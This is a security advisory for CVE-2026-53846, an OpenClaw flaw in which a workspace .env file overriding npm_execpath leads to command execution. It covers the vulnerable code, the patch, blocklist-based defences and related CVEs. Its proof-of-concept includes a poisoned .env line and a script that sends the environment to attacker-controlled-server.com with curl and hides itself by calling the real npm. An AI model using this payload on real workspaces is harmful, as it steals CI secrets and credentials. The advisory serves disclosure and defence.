Jun 19, 2026
OpenClaw before 2026.4.29 allows arbitrary command execution when an operator loads a workspace containing a poisoned .env file that overrides the npm_execpath variable.
OpenClaw versions prior to 2026.4.29 contain an untrusted search path vulnerability in the install helper module. By loading an untrusted workspace containing a crafted .env file, the application allows overriding critical environment variables, specifically npm_execpath, leading to arbitrary command execution in the context of the running process. This vulnerability is tracked as CVE-2026-53846 and GHSA-24vr-rprv-67rf.
OpenClaw contains an automated installation utility within its workspace management framework designed to facilitate runtime dependency provisioning. When a workspace is loaded, this component initializes the operational environment and installs bundled packages required for localized execution. The dependency installation mechanism relies on executing administrative packages via automated package manager binaries.
The attack surface exists within the workspace initialization phase, during which local configuration files are parsed to establish the execution environment. By default, the application reads environment variables from local files without validating whether these values modify internal runtime settings. An attacker can exploit this behavior to inject configuration overrides, redirecting the execution flow away from system-defined utilities to local binaries under their control.
The weakness is classified under CWE-426 (Untrusted Search Path), representing a vulnerability where an application executes commands via paths controlled by untrusted entities. In this context, the untrusted entity is the workspace owner or any actor capable of writing configuration files to the workspace root. The resulting impact is code execution with the privileges of the local operator running the OpenClaw service.
The core defect lies in the implicit trust placed in the Node.js process environment during sub-process generation. When scripts are started via the Node Package Manager (npm), process.env.npm_execpath is populated automatically with the absolute path of the active npm CLI script, so that nested execution chains use the identical runtime binaries.
OpenClaw leverages this environment variable to launch sub-processes that execute dependency installations in isolated folders. This is typically implemented via the child_process.spawn or child_process.exec APIs, referencing process.env.npm_execpath directly as the target command. This design assumes that the environment variable remains protected and unmodified during runtime.
However, during workspace initialization, the application employs a configuration parser to read a .env file from the workspace root. The parsing routine directly mutates the global process.env object with any key-value pairs specified in the user-provided configuration. No sanitization mechanism or blocklist was implemented to prevent the overwrite of sensitive runtime parameters, allowing the npm_execpath variable to be redefined arbitrarily.
The following code blocks illustrate the structural deficiency within the workspace parser and the subsequent corrective implementation.
```javascript
// Vulnerable Workspace Loader Implementation
const dotenv = require('dotenv');
const { spawn } = require('child_process');
const path = require('path');

function initializeWorkspace(workspacePath) {
  // Vulnerable: Blindly merging user .env variables into the global process environment
  dotenv.config({ path: path.join(workspacePath, '.env') });
}

function runInstallation(dependencyDirectory) {
  const packageManager = process.env.npm_execpath || 'npm';
  // Vulnerable: Spawning a process using the tainted npm_execpath variable
  const installWorker = spawn(packageManager, ['install'], {
    cwd: dependencyDirectory,
    shell: true
  });
}
```

The fix introduces a strict blocklist of sensitive environment variables to prevent workspace configurations from overriding internal engine settings.
```javascript
// Patched Workspace Loader Implementation
const dotenv = require('dotenv');
const fs = require('fs');
const { spawn } = require('child_process');
const path = require('path');

// Variables a workspace .env file must never be allowed to set
const RESTRICTED_ENV_VARS = [
  'npm_execpath',
  'PATH',
  'NODE_OPTIONS',
  'PYTHONPATH',
  'NODE_PATH'
];

function safeInitializeWorkspace(workspacePath) {
  // dotenv.parse() only returns the key-value pairs; dotenv.config() would already
  // have written them into process.env before the blocklist below could run
  const envFile = path.join(workspacePath, '.env');
  const parsedEnv = fs.existsSync(envFile) ? dotenv.parse(fs.readFileSync(envFile)) : {};
  for (const [key, value] of Object.entries(parsedEnv)) {
    if (RESTRICTED_ENV_VARS.includes(key)) {
      // Prevent sensitive environment variable overriding
      console.warn(`[Security] Blocked attempt to override restricted variable: ${key}`);
      continue;
    }
    process.env[key] = value;
  }
}
```

Exploitation requires the attacker to position a malicious configuration payload inside an untrusted workspace directory. The attack scenario typically involves hosting a public repository containing the exploit files or submitting them to an existing repository via a pull request. Once a trusted developer or build agent fetches and opens the directory within OpenClaw, the execution flow is triggered automatically.
The attack vector leverages two distinct files situated in the root of the malicious workspace: a configuration file and an executable payload script. The .env file serves as the redirection mechanism, redefining the execution path of the package manager to point directly to the localized payload script.
```ini
# Poison the package manager path within the workspace environment
npm_execpath=./scripts/compile_assets.sh
```

The local script (compile_assets.sh) contains the secondary payload designed to execute arbitrary instructions under the privilege context of the target system.
```bash
#!/bin/bash
# Malicious script executing inside the target environment
# Exfiltrating workspace metadata to an external endpoint
curl -d "$(env)" https://attacker-controlled-server.com/log
# Fallback to execution of the legitimate package manager to avoid detection
exec /usr/bin/npm "$@"
```

When OpenClaw processes this workspace, it executes the payload in place of the standard package manager. The process executes seamlessly, hiding the malicious execution path from the local operator unless process telemetry or system call auditing is actively configured on the host machine.
The security implications of this flaw are significant, resulting in arbitrary execution within local or continuous integration (CI) environments. An attacker who successfully compromises a workspace can execute system-level commands with the administrative privileges of the running OpenClaw instance. This access allows the attacker to read, modify, or delete localized files and runtime configurations.
In typical continuous integration pipelines, this execution step is a critical choke point. Compromising the build agent provides access to secrets, deployment keys, and cloud credentials stored in memory or in local files, which can facilitate lateral movement within enterprise cloud accounts and code repositories and enable downstream supply chain attacks.
The vulnerability is assessed with a CVSS v3.1 score of 7.1 (High) and a CVSS v4.0 score of 7.0 (High). The primary limiting factor is the requirement for local user interaction, as a trusted operator must actively load or process the compromised workspace directory. However, the exploit complexity is exceptionally low, and no administrative privileges are required to compile the malicious workspace files.
The primary remediation path requires upgrading the OpenClaw installation to version 2026.4.29 or later. This release enforces validation rules on workspace environment variables, neutralizing the path hijacking vectors completely. Ensure that any secondary staging environments or build nodes are updated simultaneously to prevent exposure of peripheral runners.
Where an immediate upgrade is unfeasible, administrators should implement manual defensive controls within the runtime configuration. Disable the automatic installation of bundled dependencies within the global application settings. If dependency installation is mandatory, restrict the service's operating permissions by isolating it inside a minimal container with limited outbound networking and restricted file system write access.
Defenders should configure host intrusion detection systems (HIDS) to monitor execution events generated by OpenClaw. Generate alerts when the OpenClaw binary spawns atypical shells or scripts instead of standard node execution modules. Regularly scan workspaces for the presence of the npm_execpath directive inside .env configuration files to identify potential malicious indicators before initialization.
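As an added example (not OpenClaw's code), the following loader generalizes the patch shown earlier: it parses the workspace .env without ever touching process.env, refuses the restricted keys case-insensitively plus every npm_* key, and hands the install step a fixed command with a scoped environment in which the host's own values win. screenWorkspaceEnv doubles as the .env scanner suggested above; the minimal parser, the function names and the sample .env are assumptions constructed here.

```javascript
// Keys a workspace .env must never set, compared case-insensitively (names are
// case-insensitive on Windows); every npm_* key is refused as well, since npm
// populates those itself and a loader should never accept them from a file.
const RESTRICTED_ENV_VARS = new Set(['npm_execpath', 'path', 'node_options', 'node_path', 'pythonpath']);

function isRestrictedKey(key) {
  const k = key.toLowerCase();
  return RESTRICTED_ENV_VARS.has(k) || k.startsWith('npm_');
}

// Minimal .env parser (KEY=VALUE, '#' comments, optional surrounding quotes).
// Unlike dotenv.config(), it returns a plain object and never touches process.env.
function parseDotenv(text) {
  const out = {};
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith('#')) continue;
    const eq = line.indexOf('=');
    if (eq <= 0) continue;
    let value = line.slice(eq + 1).trim();
    if (/^(['"]).*\1$/.test(value)) value = value.slice(1, -1);
    out[line.slice(0, eq).trim()] = value;
  }
  return out;
}

// Split a workspace .env into accepted entries and the keys that were refused;
// the blocked list doubles as a scan result when auditing checked-out workspaces.
function screenWorkspaceEnv(text) {
  const accepted = {};
  const blocked = [];
  for (const [key, value] of Object.entries(parseDotenv(text))) {
    if (isRestrictedKey(key)) blocked.push(key);
    else accepted[key] = value;
  }
  return { accepted, blocked };
}

// Spawn parameters for the install step: a fixed command never read from the
// environment, no shell, and a per-process env in which the host's own values
// take precedence over anything the workspace supplied.
function installSpawnPlan(workspacePath, envText, baseEnv = process.env) {
  const { accepted } = screenWorkspaceEnv(envText);
  return { command: 'npm', args: ['install'],
           options: { cwd: workspacePath, env: { ...accepted, ...baseEnv }, shell: false } };
}

// Constructed sample mirroring the advisory's poisoned workspace file.
const SAMPLE_ENV = '# workspace settings\nASSET_BUCKET="static-assets"\n' +
  'npm_execpath=./scripts/compile_assets.sh\nPath=./bin\n';
```

Feeding installSpawnPlan's return value to child_process.spawn(command, args, options) keeps the workspace's own variables available to the install while npm_execpath and PATH stay exactly as the host set them.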
CVSS v3.1 vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

| Product | Affected Versions | Fixed Version |
|---|---|---|
| openclaw/OpenClaw | < 2026.4.29 | 2026.4.29 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-426 (Untrusted Search Path) |
| Attack Vector | Local (AV:L) |
| CVSS Score | 7.1 (CVSS:3.1) |
| Exploit Status | Proof-of-Concept (PoC) |
| KEV Status | Not Listed |
| Impact | Arbitrary Code Execution (RCE) |
The product uses an untrusted search path that contains namespaces, directories, or environment variables controlled by an external/untrusted entity, allowing execution of unintended code.
OpenClaw versions before 2026.4.24 contain an insecure file permissions vulnerability in the configuration recovery mechanism. When a local configuration repair is triggered, the recovery path restores the primary configuration file, `openclaw.json`, with overly broad permissions. This enables low-privileged local attackers in multi-user or shared hosting environments to read sensitive system credentials, API tokens, and private assistant configurations.
A missing authorization vulnerability (CWE-862) exists within the shared memory search interface (memory-wiki) of OpenClaw prior to version 2026.4.29. The application fails to apply visibility controls to search queries targeting `/api/memory-wiki/search`. Consequently, an authenticated attacker with low-level privileges can query the global index and exfiltrate sensitive memory entries belonging to other active or historical sessions without authorization.
CVE-2026-53860 details an authorization bypass in the OpenClaw AI gateway's BlueBubbles integration. The vulnerability arises because the sender policy check validates mutable conversation-level metadata rather than verified, stable sender identities. This allows unauthorized group chat participants to manipulate metadata, match allowlist rules, and run unauthorized AI agent actions.
An incorrect authorization vulnerability in OpenClaw before 2026.5.12 allows authenticated attackers with low privileges to bypass the argument restriction policy on Linux and macOS platforms. By exploiting the omitted validation of the argPattern parameter, attackers can execute allowlisted binaries with arbitrary command line arguments, leading to unauthorized code execution and system compromise.
An authorization bypass vulnerability in OpenClaw versions prior to 2026.4.25 allows authenticated users to execute the 'focus' command without proper controlScope validation. Because the routing engine fails to enforce configured access policies on this specific command pathway, low-privilege operators can alter the gateway's global focus state, leading to potential unauthorized cross-channel or cross-session interaction depending on downstream configuration.
OpenClaw before version 2026.5.7 contains a security vulnerability where the allowFrom feature improperly validates Discord account identity using mutable display names rather than immutable user IDs. This allows remote attackers to bypass authorization controls and escalate privileges by changing their Discord display or global names to match a configured policy entry.